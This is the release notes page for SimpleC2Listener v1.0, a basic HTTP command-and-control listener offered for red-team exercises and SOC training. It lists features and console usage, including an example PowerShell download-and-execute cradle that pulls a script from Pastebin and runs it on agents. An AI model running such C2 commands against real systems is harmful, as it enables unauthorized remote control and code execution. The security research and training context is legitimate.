Releases: acquiredsecurity/SimpleC2Listener
SimpleC2Listener v1.0
SimpleC2Listener v1.0.0
Release Date: May 28, 2025
Type: Initial Release
🎯 Overview
SimpleC2Listener is a lightweight HTTP-based Command & Control (C2) framework designed for cybersecurity research, red team exercises, and SOC training scenarios. This initial release provides core C2 functionality with a focus on simplicity and educational use.
✨ Features
Core C2 Capabilities
- HTTP-based communication - Simple REST API for agent check-ins
- Remote command execution - Execute PowerShell commands on connected agents
- Session management - Track multiple agents with hostname, username, and last-seen timestamps
- Console interface - Interactive command-line interface for operators
- Cross-network support - Works across local networks and subnets
Agent Management
- Agent registration - Automatic agent discovery and tracking
- Command queuing - Queue commands for agents during check-in cycles
- Result collection - Capture and display command output from agents
- Session persistence - Maintain agent sessions across reconnections
Security Research Features
- Remote script execution - Execute scripts hosted on external services (Pastebin, etc.)
- System reconnaissance - Built-in support for common recon commands
- Process enumeration - Monitor running processes and system information
- Network discovery - Enumerate network configuration and active connections
🚀 Quick Start
Prerequisites
- Windows operating system
- Network connectivity between listener and agents
Running the Listener
SimpleC2Listener.exe
The listener will start on http://localhost:8080 by default.
Console Commands
list agents # Show active agents
cmd <agent_id> <command> # Execute PowerShell command
exit # Shutdown listener
Example Usage
C2> list agents
C2> cmd agent_001 whoami
C2> cmd agent_001 Get-Process | Select-Object -First 10
C2> cmd agent_001 IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/example')
🔧 Configuration
Network Configuration
- Default port: 8080
- Supports both HTTP and cross-network communication
- Firewall configuration may be required for remote agents
Agent Configuration
Compatible with BeaconSim agents configured with:
c2_server:
url: "http://your-server-ip:8080"
agent_id: "unique_agent_id"📋 System Requirements
Listener (Server)
- OS: Windows 10/11, Windows Server 2016+
- Framework: .NET Framework 4.8+
- Memory: 50MB RAM minimum
- Disk: 10MB available space
- Network: Open port 8080 (configurable)
Agent (Client)
- OS: Windows with PowerShell support
- Framework: .NET Framework 4.8+ or .NET 9.0+
- Network: HTTP/HTTPS connectivity to listener
🛡️ Security Considerations
Important: This tool is designed for authorized security testing and educational purposes only.
- No encryption - Communications are sent in plaintext HTTP
- No authentication - No built-in access controls
- No stealth features - Basic HTTP communications easily detectable
- Local network recommended - Not hardened for internet deployment
🐛 Known Issues
- Console interface may not display properly in some terminal emulators
- Large command outputs may cause display formatting issues
- No automatic agent cleanup for disconnected sessions
- Limited error handling for network connectivity issues
🔮 Roadmap
Future versions may include:
- HTTPS/TLS encryption
- Web-based management interface
- Multi-operator support
- Enhanced stealth capabilities
- File upload/download functionality
- Session logging and reporting
🤝 Contributing
This project is part of the AcquiredSecurity toolkit. Contributions, issues, and feature requests are welcome.
📄 License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
⚠️ Disclaimer
This software is provided for educational and authorized security testing purposes only. Users are responsible for ensuring compliance with all applicable laws and regulations. The authors assume no liability for misuse of this software.